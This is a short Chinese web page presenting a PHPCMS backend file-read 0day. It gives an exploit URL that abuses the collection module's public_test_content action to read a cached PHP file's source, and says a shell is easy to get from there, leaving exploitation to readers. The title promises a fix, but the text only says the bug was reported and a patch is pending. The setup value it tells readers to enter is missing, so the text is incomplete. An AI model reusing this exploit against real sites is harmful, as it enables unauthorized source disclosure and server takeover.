当前位置:主页 > 建站教程 > PHPCMS >

phpcms后台普通用户读文件0day的分析以及修复方法

发布时间:2019-10-08 来源:未知 浏览: 关键词:

后台采集里设置采集模块中title 或者其他的内容都可以 设置为 然后用下面的代码就可以读取到php的源了。 index.php?clientid=name&url=caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx 拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。 修复:已提交给官方,等待补丁

魔酷阁温馨提示:如果你正在寻找优秀的phpcms模板,那你可以到魔酷阁的 phpcms模板 频道看看,相信一定有你喜欢的!

责任编辑:admin
共有人阅读,期待你的评论!评论
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!
Top